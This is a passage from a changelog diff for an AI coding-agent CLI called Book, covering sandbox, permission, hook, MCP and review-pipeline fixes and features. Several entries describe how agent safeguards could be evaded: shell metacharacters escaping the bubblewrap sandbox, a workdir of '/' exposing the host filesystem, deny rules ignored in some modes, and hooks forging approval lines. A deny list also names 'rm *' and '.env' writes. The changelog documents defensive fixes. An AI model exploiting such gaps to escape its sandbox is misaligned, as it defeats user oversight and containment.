+ `book doctor` printed a `book config set hooks.projectEntries '<json>'` one-liner to paste, which
1829
+ was wrong three ways: `config set` _replaces_ the value at a path and the printed map held only
1830
+ the newly pending entries, so running the suggestion silently revoked every earlier approve and
1831
+ reject; the command omitted `--workspace`, so running it anywhere but the diagnosed directory
1832
+ wrote the decision into the wrong project; and its single-quoted JSON does not survive `cmd.exe`,
1833
+ where quotes are literal and the argument reached validation as a string. Decisions are now
1834
+ recorded one at a time, a fingerprint needs no quoting, and doctor names the workspace it
1835
+ diagnosed. Repository-authored text in that report — commands, matchers, environment values — is
1836
+ escaped before printing, so a hook cannot use newlines or ANSI escapes to forge a report line and
1837
+ pass itself off as already approved.
1838
+
1839
+ - **Print/headless and SDK runs no longer report withheld project declarations under
1840
+ `--no-settings`.** Both hosts read `.book/settings.json` off disk unconditionally and compared it
1841
+ against the resolved decision store, which under `--no-settings` is the empty default: a run in a
1842
+ repository with project hooks announced that it was ignoring hooks pending approval, when the
1843
+ hooks were skipped because settings layers were disabled and approving them would change nothing.
1844
+ Already-approved hooks were reported as pending for the same reason.
1845
+
1846
+ - **`connectMcpServers()` now fails closed when no host has adjudicated approval.** Called without
1847
+ an explicit server list it resolved every declared server — user-global _and_ repository-declared
1848
+ — and connected them all, so the project-server approval gate held only because each caller
1849
+ remembered to pass an approved subset. It now connects user-scoped servers only and reports each
1850
+ project-declared server it refused, by name and config path. No shipped caller changes behavior:
1851
+ the TUI, headless, and SDK paths all supply an explicit list already. What changes is that a
1852
+ future caller cannot reach a repository-controlled server by omitting an argument.
1853
+
1854
+ - **`permissions.deny` rules now hold in every permission mode.** The hard-deny check ran only for
1855
+ file-mutating tools, and `auto` and `bypassPermissions` skip the permission block entirely — so
1856
+ in those two modes a deny rule was enforced for `Write` and `Edit` and silently ignored for
1857
+ everything else. `deny: ["Bash(rm *)", "Write(.env)"]`, the pair in the README's own settings
1858
+ example, was half-enforced under `--permission-mode auto`: the `Write` rule blocked, the `Bash`
1859
+ rule matched nothing. The deny check now runs for every tool ahead of the mode logic, so a rule
1860
+ the user already wrote is applied whether or not the mode would have prompted. Modes still decide
1861
+ only what happens to calls no deny rule matched.
1862
+ - **The Bash sandbox now actually contains the command it wraps.** The bubblewrap invocation was
1863
+ joined into a single string and spawned with `shell: true`, so the host shell re-parsed the whole
1864
+ wrapper — including the user's unquoted command — before bubblewrap ever ran. Any metacharacter
1865
+ (`;`, `&&`, `|`, `$(…)`, a backtick) split at the outer level and executed on the host, outside
1866
+ the sandbox; a workspace path containing a space broke the invocation outright. Sandboxed
1867
+ commands are now spawned as a direct argument vector with `shell: false`, and the command reaches
1868
+ `/bin/bash -c` inside the sandbox as one argv element. Shell syntax still works — it is parsed by
1869
+ the shell _inside_ the namespace. This covers all three spawn paths: foreground `Bash`, session
1870
+ background shells, and persistent jobs through the detached runner.
1871
+ - **Declared sandbox filesystem and network policy is now enforced instead of ignored.**
1872
+ `sandbox.filesystem.allowWrite`, `denyWrite`, and `denyRead` were accepted by the schema and
1873
+ never read; the builder took the settings as an unused parameter and always emitted
1874
+ `--share-net`. They now render as `--bind`, `--ro-bind`, and masking `--tmpfs` mounts applied
1875
+ after the workspace bind so explicit policy wins. Because bubblewrap has no per-domain
1876
+ filtering, any `sandbox.network` domain rule now fails closed to `--unshare-net` with a warning
1877
+ rather than silently granting the full host network.
1878
+ - **The sandbox binds the workspace root, not the caller's `workdir`.** `workdir` is a
1879
+ model-supplied `Bash` argument, and it used to be the directory the sandbox mounted writable.
1880
+ Combined with the mount reordering below, `workdir: "/"` would have emitted `--bind / /` after
1881
+ every default mount, shadowing all of them and returning the entire host filesystem read-write
1882
+ while the output was still labelled `[sandboxed]`. A sandboxed command whose `workdir` resolves
1883
+ outside the workspace is now rejected; extra directories go through `sandbox.filesystem.allowWrite`.
1884
+ - Sandboxed commands run with `--die-with-parent` so a contained tree cannot outlive the process
1885
+ that spawned it. `--new-session` is deliberately not used: it calls `setsid()`, which moves the
1886
+ sandbox into its own process group, and every teardown path (`KillShell`, foreground timeout,
1887
+ Ctrl-C) signals the group Node created and confirms death with `kill(-pgid, 0)` — the group would
1888
+ have read as empty while the command kept running.
1889
+ - Fixed a mount-ordering bug that made the workspace read-only or invisible when it lived under a
1890
+ system prefix or under `/tmp`: the workspace bind was emitted before the read-only system binds
1891
+ and the `/tmp` tmpfs, which then shadowed it. The workspace is now bound after both.
1892
+ - `sandbox.filesystem.denyRead` masks a file with `/dev/null` and a directory with a tmpfs. Using
1893
+ a tmpfs for both would have aborted every sandboxed command with `Can't mkdir …: Not a directory`
1894
+ whenever the denied path was a file — which is the most natural thing to deny.
1895
+ - `sandbox.filesystem` entries may start with `~`, which is now expanded. Previously `~/.ssh`
1896
+ resolved to a nonexistent `<cwd>/~/.ssh` and was skipped in silence, leaving the path unprotected
1897
+ while the setting suggested otherwise. Unapplicable entries are now reported at startup and by
1898
+ `book doctor`, which also prints the policy the sandbox is actually enforcing.
1899
+ - The persistent job runner refuses to start a spec whose `sandboxed` flag disagrees with the
1900
+ presence of a sandboxed argv, instead of silently running the command unconfined.
1901
+ - **`sandbox.allowUnsandboxedCommands` and `sandbox.autoAllowBashIfSandboxed` are enforced instead
1902
+ of merely validated.** Both keys were accepted by the settings schema and read by nothing:
1903
+ sandboxing granted no permission auto-allow, and `allowUnsandboxedCommands: false` refused
1904
+ nothing, which left `sandbox.excludedCommands` as the only sandbox setting that had any effect.
1905
+ Both now decide from one shared predicate — will this exact command really execute inside a
1906
+ bubblewrap namespace? — so they cannot disagree about a command. `allowUnsandboxedCommands: false`
1907
+ refuses any `Bash` command that would run outside the sandbox, covering all three escapes
1908
+ (sandboxing off, an `excludedCommands` match, a missing backend), and the refusal names the
1909
+ setting and the specific reason rather than denying bare. `autoAllowBashIfSandboxed: true` skips
1910
+ the prompt only for a command that genuinely runs inside the sandbox, and only in place of the
1911
+ _default_ ask: `permissions.deny` is evaluated first and is never softened, an explicit
1912
+ `permissions.ask` rule still prompts, and any configured deny/ask rule at all keeps the default
1913
+ ask — a shell line escapes a glob far too easily for the rules that happened to match to be the
1914
+ whole protection. `sandbox.enabled` still defaults to `false`, so nothing changes for anyone who
1915
+ has not opted into sandboxing. `book doctor` now prints the effective — not merely configured —
1916
+ state of both keys alongside the `excludedCommands` count, reporting an auto-allow that cannot
1917
+ bite as inert instead of as enabled policy.
1918
+ - Raised the `postcss` override from `8.5.18` to `8.5.26`, clearing CVE-2026-69153
1919
+ (GHSA-fxqj-rqcc-2cmp, moderate): an attacker-controlled `sourceMappingURL` could read arbitrary
1920
+ `.map` files when `opts.from` was unset. `postcss` is a build-time-only transitive dependency of
1921
+ `tsup` and `vite`, so no shipped runtime code was affected. The pin, added for CI dependency
1922
+ stability, was holding `postcss` below the `^8.5.25` floor `vite` already declares; it stays an
1923
+ exact pin.
1924
+
1925
+ ### Fixed
1926
+
1927
+ - **`--workspace` acted on the current directory instead, in whichever placement you used.** The
1928
+ root command and every subcommand both declare `-w/--workspace`; under commander 15 a `-w`
1929
+ following a subcommand is routed to the root, leaving the subcommand on its `process.cwd()`
1930
+ default. `book doctor`, `config`, `mcp`, and `tool-stats` all reported on the wrong directory, and
1931
+ `book config set --workspace <path>` wrote settings into the current one. Enabling positional
1932
+ option parsing fixes the after-subcommand placement, but it splits the two placements across
1933
+ different command objects, so `book --workspace <path> <subcommand>` was still silently ignored —
1934
+ the same silent-wrong-directory hazard, just moved to the placement most people reach for first.
1935
+ The subcommand option no longer defaults to `process.cwd()`, so an unset one falls through to the
1936
+ root's value: all three placements — before the subcommand, after it, and after its positional
1937
+ arguments — now name the same directory. The CLI tests asserted only exit status, so the original
1938
+ regression arrived green with the commander 14 to 15 bump; they now assert the flag has an effect
1939
+ in every placement, and pin a marker into a workspace distinct from the fake `HOME` so an ignored
1940
+ flag cannot be rescued by the user-global layer resolving to the same file.
1941
+
1942
+ - **Root options written after a subcommand name became errors.** Positional option parsing rejects
1943
+ a root option that follows the subcommand, so `book config get model --settings <path>` started
1944
+ failing with `unknown option '--settings'` — an undocumented break, and a natural invocation,
1945
+ since the `config` action deliberately reads the root's `--settings`. `--settings` and
1946
+ `--no-settings` are re-declared on `config`, which prefers its own value and falls back to the
1947
+ root's; both flags work on either side of the subcommand again.
1948
+
1949
+ - **Running the CLI test suite could write settings into the repository.** The tests spawned the CLI
1950
+ from the checkout, so a bug that dropped `--workspace` wrote into the developer's real
1951
+ `.book/settings.local.json`; the guard meant to catch it skipped itself whenever that file already
1952
+ existed, which is the documented normal state for that scope — inert on exactly the machines that
1953
+ needed it. The child now runs from a scratch directory, so a stray write structurally cannot reach
1954
+ the repository, and the assertion fires everywhere.
1955
+
1956
+ - **`book doctor` now runs without a working credential.** Doctor resolved its config through the
1957
+ throwing `loadConfig`, so the single most common broken environment — no `BOOK_API_KEY` — killed
1958
+ it with an unhandled stack trace before it reached the `BOOK_API_KEY: (not set)` line it was
1959
+ about to print. The command a user reaches for when nothing works now reports a missing
1960
+ credential as a finding (`Credentials: not resolved`) instead of dying on it. A new
1961
+ `src/cli/subcommands.contract.test.ts` holds every non-interactive subcommand — `doctor`,
1962
+ `config`, `mcp list`, `tool-stats` — to running with no API key configured, so the class of
1963
+ regression cannot come back through another command. That guard covered only the missing
1964
+ credential, though: every other rejection — malformed JSON, a schema violation, an unknown
1965
+ `harness.workflow` — still escaped as a raw stack trace, which is the least useful possible
1966
+ response from the command whose job is diagnosing a broken setup. A configuration that will not
1967
+ load is now reported as `Configuration: FAILED TO LOAD` with the reason and the settings layers
1968
+ in the order they apply, so the offending file is named.
1969
+
1970
+ - **The `Stop` hook fires once per run instead of once per provider turn.** It ran inside the turn
1971
+ loop, so a task that took twelve tool-call turns invoked it twelve times — a hook meant to
1972
+ observe "the agent finished" observed "a round-trip finished". It now runs after the loop exits,
1973
+ once the terminal outcome is settled and before `SessionEnd`. Subagents no longer fire it at all:
1974
+ `Task` and managed agents run the same loop with the parent's hook config, and managed agents
1975
+ already report through `SubagentStop`, so one prompt that spawned three managed agents fired
1976
+ `Stop` four times — three of them naming a worktree as the workspace.
1977
+ - **`Stop` and `SessionEnd` now fire when a run is cancelled, and no longer warn on every Ctrl-C.**
1978
+ Both passed the run's abort signal to `runHooks`, which calls `signal.throwIfAborted()` ahead of
1979
+ its empty-hook-list guard. A cancelled run therefore skipped the hooks and logged
1980
+ `Stop hook failed: AbortError` — including for the majority of users who configure no terminal
1981
+ hooks at all. Cancellation is when a "the agent stopped" hook matters most, and neither hook has
1982
+ anything left to cancel by the time it runs, so neither takes the signal now.
1983
+ - **A denied skill activation no longer leaves a consent request open forever.** When a
1984
+ `permissions.deny` rule blocked an `InvokeSkill` call, the loop returned without the
1985
+ `denyConsent` that the interactive deny path performs, so `/skills` and the skill diagnostics
1986
+ showed a `skill_consent_requested` event with no resolution.
1987
+ - Hook events are documented in the README for the first time: which are awaited (all but `Stop`,
1988
+ and `SessionStart`/`SessionEnd` on the one-shot SDK path), and which can actually change the
1989
+ outcome. `PostToolUse` is awaited and rewrites tool output — it cannot veto a call, but a slow
1990
+ one delays every tool call by up to the 10 s hook timeout.
1991
+ - **The skill watcher no longer aborts the process on Windows when the workspace is reached through
1992
+ a short path or junction.** `fs.watch` was handed the path as given, but Windows reports
1993
+ directory-change events under the volume's canonical path, and libuv asserts the two match
1994
+ (`!_wcsnicmp(filename, dir, dirlen)` in `src/win/fs-event.c`). Watching a path with an 8.3 alias
1995
+ such as `C:\Users\RUNNER~1\…` failed that assertion, and a failed libuv assertion calls `abort()`
1996
+ — so the CLI died with no catchable error, and no `onError` handler could have caught it, as soon
1997
+ as a watched skill directory changed. Watched directories are now canonicalized with
1998
+ `realpathSync.native` first. POSIX behavior is unchanged. This was also the cause of the
1999
+ long-standing `Check (windows-latest, Node 24.x)` CI failures, where every test passed but two
2000
+ vitest workers exited unexpectedly: the runner's `%TEMP%` is an 8.3 alias, so the two tests that
2001
+ open real watchers aborted their workers.
2002
+ - The skill watcher no longer reopens every directory handle each time a skill file changes. A
2003
+ debounced rebuild now closes only the watchers whose directories left the watched set and opens
2004
+ only newly in-scope ones, instead of closing and reopening all of them. The old churn cost one OS
2005
+ directory handle per watched directory on every save, which is wasteful on every platform and
2006
+ worst on Windows, where each handle is a separate `ReadDirectoryChangesW` registration.
2007
+ - `SessionRuntime` now threads one set of skill-discovery options through both the skill registry
2008
+ and the skill watcher (`skillDiscoveryOptions`), so the two cannot disagree about which roots
2009
+ exist and tests can pin discovery inside a temp workspace instead of the real home directory.
2010
+ - `/review` no longer reports a clean review when it silently discarded findings. A reviewer pass
2011
+ whose report envelope parses but whose individual findings fail the per-finding contract (missing
2012
+ evidence, failure scenario, suggested fix, or a numeric confidence) is now recorded as `partial`
2013
+ rather than `completed`: the dropped count is reported in the coverage warning, the verdict is
2014
+ capped at `inconclusive`, and the reviewer's raw output is preserved so the lost findings are
2015
+ recoverable. Previously the report showed zero findings and a `clean` verdict with no indication
2016
+ anything had been dropped.
2017
+ - `/review` deduplication once again collapses the same defect reported by more than one reviewer.
2018
+ Findings are bucketed by category/file/line, then compared by summary similarity, so two lenses
2019
+ describing one defect in different words collapse to a single finding while two genuinely
2020
+ different defects on the same line stay separate. Deduplication had become sensitive to exact
2021
+ wording, which meant cross-reviewer duplicates — the case `--deep` produces most — survived into
2022
+ the report. The wording-sensitive key remains in use for the evaluation harness, where matching a
2023
+ specific finding is the point.
2024
+ - A user or project agent definition named `reviewer` is no longer discarded without a word. The
2025
+ built-in `reviewer` remains a trust boundary — a same-named definition still cannot replace its
2026
+ role, tools, isolation, or body — but the suppression is now recorded and reported by
2027
+ `book doctor`, naming the layer the ignored definition came from and pointing at
2028
+ `agents.profiles.reviewer` for the model/effort tuning that does apply.
2029
+ - The CLI now defaults `NODE_ENV` to `production` before React loads, so the TUI renders with
2030
+ production React instead of the 2-3x slower development build (an explicitly set `NODE_ENV`
2031
+ still wins). `npm run bench:ui` measures production mode to match. Combined with new render-path
2032
+ caching — a revision-stable transcript viewport snapshot, per-message row-estimate reuse in the
2033
+ virtualized transcript, a stable streaming timeline identity, memoized layout-revision hashing,
2034
+ and fast paths in `displayWidth` — long-transcript streaming updates and unrelated managed-trace
2035
+ updates render 3-4x faster and back inside their latency budgets.
2036
+ - Background shells and long-running Bash commands no longer make the TUI sluggish. Shell output
2037
+ events are coalesced to a 250ms refresh and the shell list bails out when nothing it renders has
2038
+ changed, so raw stdout/stderr chunk frequency no longer drives full App re-renders and Yoga
2039
+ layout passes. The shell detail view reads its output tail in a polling effect instead of doing
2040
+ synchronous file I/O inside App's render. Running tool rows tick their elapsed time once per
2041
+ second (previously 10x/s) with second granularity, and stop ticking entirely under reduced
2042
+ motion. Large tool-output previews measure bytes with one call over the whole output instead of
2043
+ allocating a Buffer measurement per line, and the markdown sniff over expanded output is
2044
+ memoized.
2045
+ - Managed children now publish and review evidence through their owning agent manager instead of
2046
+ being rejected as owned by another live Book process.
2047
+ - Provider-emitted `parent:`, `default:`, and `tool:` wrappers resolve to an existing registered
2048
+ tool, and `glob_files` resolves to `Glob`; unrelated namespaced commands remain rejected.
2049
+ - Vitest runs no longer append synthetic tool calls to the user-global `book tool-stats` history.
2050
+ - Windows now defaults to the full-frame TUI renderer so deep transcript scrolling cannot corrupt
2051
+ or erase the fixed input and status footer. Incremental rendering remains available through an
2052
+ explicit `BOOK_TUI_RENDERER=incremental` override.
2053
+ - Mouse-wheel scrolling now reaches conversation history when the Windows CLI runs from WSL,
2054
+ instead of being translated into Up/Down prompt-history navigation by the outer terminal.
2055
+ - Stopping a background job on Linux and macOS no longer records `killed` while the job's processes
2056
+ keep running. Background commands run through `sh -c`, which forks the real worker, so the shell
2057
+ wrapper dies from SIGTERM even when the worker ignores it — and both the persistent job runner
2058
+ and the session-lifetime shell manager read that wrapper's exit as proof the tree had gone, so
2059
+ they never escalated to SIGKILL. Termination now escalates and reports success based on whether
2060
+ the job's process group still holds a process, so an orphaned worker can no longer keep ports,
2061
+ file handles, and CPU behind a terminal `killed` record. Windows already terminated the tree
2062
+ through `taskkill /T /F` and is unchanged.
2063
+ - **Print/headless plan mode no longer auto-rejects the plan it asked for.**
2064
+ `book -p --permission-mode plan …` rejected every `ExitPlanMode` call unconditionally, so the
2065
+ model revised and resubmitted until `--max-turns` was gone and the run ended `failed`/`max_turns`
2066
+ with nothing to show for it. A host that supplies `onUserQuestionRequired` now decides the plan
2067
+ through that same handler — one question, `Approve` / `Reject`, with any other free-text answer
2068
+ taken as revision feedback — and `bypassPermissions` still approves automatically. A host with no
2069
+ handler cannot approve anything, so the run stops at the first plan and returns the plan as its
2070
+ deliverable: `text` prints the plan followed by an explicit "no changes were applied" line,
2071
+ `json` and `stream-json` add
2072
+ `plan: {status: "not_applied", reason, plan, message}`, the outcome is
2073
+ `completed`/`normal_completion`, and the process exits 0 — "finished and deliberately changed
2074
+ nothing" is expressed by `plan.status`, not by an exit code. The `plan_approval` stream event's
2075
+ `status` is now one of `approve`, `approve-fresh`, `reject`, `revise`, or `stop`.
2076
+
2077
+ ### Added
2078
+
2079
+ - **A BYOK provider's model list can be filled in by hand, and an existing one can be updated
2080
+ without re-adding the provider.** The add-provider wizard used to fire model discovery the
2081
+ instant the API key was submitted, so an endpoint with no model-list API could only be
2082
+ configured by failing discovery first and taking the error screen's fallback. It now asks where
2083
+ the list should come from — discover automatically, or type the model IDs (comma-separate for
2084
+ several) — before any request is made; the post-failure fallback remains. For a provider that is
2085
+ already configured, selecting one of its models in `/model` or `/providers` exposes `Alt+R` to
2086
+ re-read the catalog from the endpoint and `Alt+M` to add model IDs by hand, both announced on the
2087
+ row itself and neither changing the active model or the stored credentials. Both follow the same
2088
+ ownership rule as `Alt+D` — only providers you added, since a catalog edit is written to
2089
+ `~/.book/settings.json` and applying one to a provider inherited from a project layer would copy
2090
+ that provider's credential into a second file and make the inherited copy look removable.
2091
+ - A refresh replaces what discovery previously returned, but **hand-entered models survive it**.
2092
+ They are recorded as `"manual": true` under `provider.<id>.models.<model>` for exactly this
2093
+ reason: they exist because the endpoint does not list them, so a refresh that dropped them
2094
+ would undo the user's work every time. The marker is cleared once discovery starts returning
2095
+ that id on its own.
2096
+ - Adding models to an existing provider no longer rewrites its `baseURL` and `apiKey` with the
2097
+ values the caller happened to carry. Previously `providerConfigFromDraft` always wrote both,
2098
+ which also meant a provider configured with the legacy lowercase `baseUrl` key failed schema
2099
+ validation on refresh instead of saving. Writing a `baseURL` now retires any legacy `baseUrl`
2100
+ beside it, which would otherwise linger in `settings.json` as a stale value that reads as live.
2101
+ - An endpoint that returns an empty list is reported on both paths. A refresh used to throw while
2102
+ picking an active model out of the empty result; the wizard used to drop the user on an empty
2103
+ "Choose models" screen that answered `Enter` with "Select at least one model." and offered no
2104
+ way forward.
2105
+ - The highlighted model no longer slides out from under the cursor when a catalog changes.
2106
+ Model ids are sorted, so a refresh or a manual add re-orders the list and the highlight used to
2107
+ stay on an index rather than a model — `Enter` could then save a neighbouring model as the
2108
+ default. The selection is re-anchored on the id it was on.
2109
+ - **Slash commands work in print/headless mode.** `book -p /security-review`, `book -p /init`, and
2110
+ any `.book/commands/*.md` command now resolve through the same registries, the same
2111
+ `$1..$9` / named-argument / `${BOOK_*}` / shell substitution, and the same `allowed-tools` and
2112
+ `model` frontmatter enforcement as the TUI, instead of being handed to the model as literal text.
2113
+ Commands that need an interactive surface — session controls, pickers, panels, `/config`,
2114
+ `/export`, `/memory` — are refused _before_ their own code runs, so none of their side effects can
2115
+ half-fire in a host that could not show the result; the error lists what is supported and the run
2116
+ exits 1. A `/name` that is not a command at all is still forwarded verbatim, so an ordinary prompt
2117
+ beginning with a path is unaffected. A command the host performed itself is reported as a
2118
+ `command_result` stream-json event and as `result.commandResults` in every output format,
2119
+ including the SDK. `expandSlashCommands: false` on `HeadlessOptions` forwards every prompt
2120
+ verbatim, for hosts relaying untrusted end-user text.
2121
+ - **`/review` runs outside the TUI.** `book -p /review`, `--deep`, `--base <ref>`, path scopes, and
2122
+ `<base>...<head>` all execute the same host-orchestrated pipeline — the host still resolves the
2123
+ review target and the reviewers still receive an immutable diff and no diff tool — and emit a
2124
+ stable machine report under `--output-format json` / `stream-json`: `verdict`, `target`,
2125
+ `findings` as `ReviewFinding` values verbatim, and the pipeline's own `coverage`, with the
2126
+ unified diff deliberately omitted. The sequencing that used to live in `src/tui/app.tsx` moved
2127
+ into `src/review/host.ts`, so the two hosts cannot drift apart. `--fix` stays interactive-only: a
2128
+ non-interactive host cannot approve a patcher's tool calls, so it is refused with an explanation
2129
+ instead of editing and committing unattended. A review that could not run — a bad ref,
2130
+ `agents.mode = off`, an unknown option — exits 1; an inconclusive _verdict_ does not, because the
2131
+ review ran.
2132
+
2133
+ - A `Maintenance` CI workflow (`.github/workflows/maintenance.yml`) that runs the deterministic half
2134
+ of the nightly maintenance work: a knip dead-code report on every pull request and on a daily
2135
+ schedule, and a scheduled `npm audit` that keeps a single rolling `Dependency security advisories`
2136
+ issue in sync. The dead-code scan now reads a committed `knip.json` and a pinned `knip`
2137
+ devDependency instead of an ad-hoc config and an unpinned `npx knip@6`, so its results are
2138
+ reproducible between runs. New scripts: `deadcode:check`, `deadcode:report`, `deadcode:json`.
2139
+ - The harness run evidence ledger writes through a durability backend seam, and a SQLite backend
2140
+ (`node:sqlite`, WAL with `synchronous = FULL`) joins the existing append-only JSONL writer. The
2141
+ JSONL writer cannot prove durability — Node exposes no portable directory fsync — so its seals
2142
+ always reported `directorySync: unavailable` and every run stayed
2143
+ `evidenceEligibility: ineligible`, which no host could ever satisfy. The SQLite backend commits
2144
+ records and the seal as transactions and seals as `eligible`. Record framing, the monotonic
2145
+ sequence, and the SHA-256 hash chain are byte-identical across backends, so a stream verifies the
2146
+ same way regardless of which wrote it, and a backend that cannot prove a guarantee still fails
2147
+ closed — the SQLite backend reads its `journal_mode` and `synchronous` pragmas back and reports
2148
+ `unavailable` when the filesystem refused WAL, rather than trusting the request. The seal now also
2149
+ records which backend made the claim. JSONL remains the default and the SQLite backend is not yet
2150
+ selectable through settings, so this changes what the ledger _can_ attest, not yet what it does.
2151
+ - Experimental execution workflows for the observe-mode harness. `harness.workflow` (settings) and
2152
+ `--harness-workflow <id>` (run-scoped) select one of three validated built-ins — `minimal`,
2153
+ `safe-edit`, and `verify-heavy` — from a hashed registry. `minimal` renders no prompt text and
2154
+ leaves provider messages byte-identical to a run with no harness. Workflows are bounded guidance
2155
+ only: permissions, sandboxing, budgets, retries, compaction, checkpoint/resume, and tool contracts
2156
+ remain host-owned, unsupported requests are clamped and recorded as `capability_clamped` evidence,
2157
+ and a definition's free-form description is never rendered as an instruction. Every run records the
2158
+ requested and effective workflow, source, reason, registry/definition digests, override scope, and
2159
+ declared complexity. Selection fails closed — a workflow chosen while `harness.mode` is `off`, an
2160
+ unknown ID, or a path-like ID is rejected by `book config set` and at startup rather than silently
2161
+ ignored. Project-defined workflow files are not loaded.
2162
+ - MCP servers can now prompt the user mid-tool-call through form elicitation. The TUI renders the
2163
+ requested fields — text, number, yes/no, and filterable choice lists — labelled with the server
2164
+ that asked, and returns the answer inside the open call; declining or cancelling answers the
2165
+ server instead of leaving it waiting. The elicitation capability is declared only when a host can
2166
+ actually prompt, so headless and SDK runs (unless they pass `onElicit`) leave servers to fail such
2167
+ requests themselves rather than block. Answers are validated against the requested schema before
2168
+ they are sent, and requests Book cannot render faithfully — URL mode, or schemas outside the
2169
+ protocol's primitive subset — are declined.
2170
+ - MCP now uses the official protocol SDK and works in the interactive TUI as well as print and SDK
2171
+ runs. It supports stdio, Streamable HTTP, and legacy SSE servers; content blocks, structured
2172
+ errors, cancellation, pagination, negotiated metadata, dynamic `tools/list_changed` refresh,
2173
+ bounded diagnostics, and graceful remote-session termination. Project `.mcp.json` servers require
2174
+ fingerprinted one-time approval, while `/mcp`, `book mcp list|get|add|remove`, `book doctor`, and
2175
+ server-scoped permission rules (`mcp__server`) expose and control the resulting surface without
2176
+ printing header or environment secrets.
2177
+ - `harness.mode: observe` now records an append-only run-evidence ledger without changing run
2178
+ behavior. Every root user request gets one canonical JSONL stream under
2179
+ `BOOK_HOME/projects/<workspace-id>/harness/v1/runs/`, written by a single writer with canonical
2180
+ JSON records, a SHA-256 previous-record hash chain, and a signed terminal seal that reports
2181
+ durability, drop/error counters, and fail-closed evidence eligibility. Persisted events pass an
2182
+ allowlist redaction policy (no prompts, tool arguments or output, file paths, commands, URLs, or
2183
+ secrets); turn, tool, usage, retry, stall, permission, and managed-agent handoff facts are
2184
+ captured as bounded scalars with OpenTelemetry-mapped names pinned to Semantic Conventions
2185
+ v1.44.0. Headless multi-turn runs defer each root seal until linked continuation turns finish;
2186
+ managed continuations join the originating root stream as explicit child runs. Retention cleanup
2187
+ honors evidence pins, truncated or tampered streams read as inspectable-but-incomplete, and
2188
+ `off` remains the inert default with no filesystem effect.
2189
+ - `/review` is now a host-orchestrated pipeline instead of an ordinary agent prompt. Book resolves
2190
+ the change once into an immutable review target (base commit, changed files, and a unified diff
2191
+ including untracked files) and hands it to read-only `reviewer` agents, so a review cannot widen
2192
+ its own scope or drift onto unrelated changes. New flags: `--base <ref>`, `--deep`, `--fix`, plus
2193
+ a path or `<base>...<head>` range argument. `--deep` fans out four specialized lenses
2194
+ (correctness, security, simplification, efficiency), deduplicates and confidence-filters their
2195
+ findings, then runs an independent falsification pass that must return one verdict per candidate.
2196
+ Coverage is explicit: a failed, timed-out, or unstructured pass caps the verdict at
2197
+ `inconclusive` rather than reporting a clean review, and output that fails the JSON contract is
2198
+ preserved verbatim instead of discarded. `--fix` applies only verified findings through the
2199
+ patcher → validator evidence pipeline, where a distinct validator must approve the exact patch
2200
+ candidate.
2201
+ - A `REVIEW.md` at the workspace root calibrates reviews for the repository. It is injected as
2202
+ calibration only and cannot change the output contract, disable verification, or broaden reviewer
2203
+ tools.
2204
+ - New built-in `reviewer` managed-agent profile (read-only, no diff tool) backing `/review`. It is a
2205
+ trust boundary: a project agent definition of the same name cannot replace its role, tools,
2206
+ isolation, or body.
2207
+ - `npm run eval:review -- <fixtures.json>` scores review output against a golden set — precision,
2208
+ recall, F1, usefulness rate, and signal-to-noise ratio — from reports captured on real runs. See
2209
+ `evals/review/fixtures.example.json`.
2210
+ - New empty startup sessions now open with an optional full-screen magical fire sequence that
2211
+ burns into the Book welcome. It is deterministic, skippable with Esc or typing, automatically
2212
+ bypassed for reduced-motion and screen-reader modes, and configurable through `/config` or
2213
+ `ui.startupAnimation`.
2214
+ - Adaptive-harness evaluations now have a reusable external-process runner that provisions fresh
2215
+ workspace, `BOOK_HOME`, user-config, cache, and temporary directories; copies only explicitly
2216
+ allowlisted ambient variables; bounds captured output; and distinguishes failure, timeout,
2217
+ cancellation, and spawn errors. Timeout and cancellation terminate the evaluator process tree
2218
+ with bounded graceful and forced teardown. This is a reproducibility boundary for trusted
2219
+ built-in fixtures, not a security sandbox for project-controlled commands. `npm run eval:edit`
2220
+ now runs every trial through this boundary with managed agents disabled and generated isolated
2221
+ settings that preserve the resolved provider-facing model ID, model metadata, retry policy, and
2222
+ whether output-token and reasoning-effort options were explicitly configured. The provider-backed
2223
+ `npm run eval:compact` benchmark now uses the same isolated settings and secret references, and
2224
+ `npm run eval:skills` parses its observation corpus in a bounded disposable worker. Ambient run
2225
+ snapshots now use schema version 2 to identify isolated evaluation Book-home contents with a
2226
+ bounded secret-safe digest while normalizing evaluator-owned temporary paths and run IDs. The
2227
+ same snapshot now fingerprints effective command and skill registries from content digests
2228
+ without retaining command or skill bodies. The runner now owns and reports prompt date, random
2229
+ seed, exact dirty/untracked runtime revision, and materialized-fixture revision. Provider-backed
2230
+ edit and compaction evaluations fail closed unless terminal, ambient, accounting, usage, pricing,
2231
+ model identity, Book-home isolation, and single-agent run-boundary evidence are eligible;
2232
+ paired compact comparisons also reject mismatched ambient, pricing, budget, or resolved-model
2233
+ identities; compact reports use schema version 3 and evaluator workers reject stale or malformed
2234
+ report shapes;
2235
+ compaction includes reducer calls and treats retried or usage-less attempts as partial evidence.
2236
+ Offline skill-observation reports explicitly mark provider-run eligibility as not applicable while
2237
+ retaining the same runner controls. These changes make Tier A/B ready for trusted built-in Phase 0
2238
+ work without admitting Tier C project-controlled or adversarial execution.
2239
+ - Architecture checks now keep offline harness evaluation code out of the live agent runtime,
2240
+ prevent evaluators from importing live execution modules, and keep permission/sandbox kernel
2241
+ modules independent from harness policy.
2242
+ - `BOOK_HOME` can now relocate Book's user-global state from `~/.book`, including settings,
2243
+ sessions, memory, managed-agent state, jobs, rewind snapshots, telemetry, tool output, MCP
2244
+ configuration, and user-level discovery. Project-local `.book/` state remains unchanged.
2245
+ - `/skills` now opens a keyboard-driven skill manager with Codex/Claude Code-inspired
2246
+ visibility controls (`auto`, `name-only`, `manual`, and `off`), explicit-use handoff,
2247
+ scope/path details, reload support, and a matching entry in `/config`.
2248
+ - Skills now use metadata-first `SKILL.md` discovery with portable `.agents/skills` compatibility,
2249
+ `.claude/skills` and OpenCode roots, lazy bodies/resources, scoped tool intersections, consent
2250
+ policies, lifecycle diagnostics, and debounced safe-boundary reloads. Existing `.book/skills`
2251
+ packages continue to work; third-party skills can be migrated by placing the same package under
2252
+ `.agents/skills/<name>/`. `/skills status` provides a body-free runtime report with catalog and
2253
+ prompt-omission diagnostics, active frames, effective tools, validation failures, and recent
2254
+ lifecycle outcomes. Conflicting skill restrictions now fail visibly instead of activating an
2255
+ empty tool surface, resource reads verify content digests against post-discovery substitution,
2256
+ and `npm run eval:skills` gates implicit rollout using privacy-safe activation metrics. Newly
2257
+ discovered skills default to explicit/manual use until that evaluation supports enabling `auto`.
2258
+
2259
